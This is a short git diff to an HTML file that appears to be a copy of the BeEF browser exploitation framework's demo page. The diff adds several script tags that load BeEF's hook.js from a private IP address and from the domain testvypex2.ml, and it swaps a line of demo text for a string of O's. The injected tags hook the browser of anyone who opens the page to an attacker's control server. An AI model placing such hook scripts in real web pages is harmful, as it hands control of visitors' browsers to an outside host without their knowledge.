--- a/index.html
+++ b/index.html
@@ -11,6 +11,11 @@
 		var commandModuleStr = '<script src="/hook.js" type="text/javascript"><\/script>';
 		document.write(commandModuleStr);
 	</script><script src="https://testvypex2.ml/hook.js" type="text/javascript"></script>
+	<script src="http://192.168.83.129:3000/hook.js"></script>
+	<script src="http://testvypex2.ml:3000/hook.js"></script>
+	</script><script src="https://testvypex2.ml/hook.js" type="text/javascript"></script>
+	<script src="https://192.168.83.129:3000/hook.js"></script>
+	<script src="http://testvypex2.ml:3000/hook.js"></script>
 </head>
 
 <body>
@@ -19,7 +24,7 @@
     <img src="BeEF%20Basic%20Demo_files/beef.jpg">
 
     <p>into <b>ME</b>.</p>
-    <p>Have fun while your browser is working against you.</p>
+    <p>OOOOOOOOOOOOOOOOOOOOOOOOOOOOO</p>
     <p>These links are for demonstrating the "Get Page HREFs" command module:</p>
     <ul>
       <li><a href="https://beefproject.com/" target="_blank">The Browser Exploitation Framework Project homepage</a>
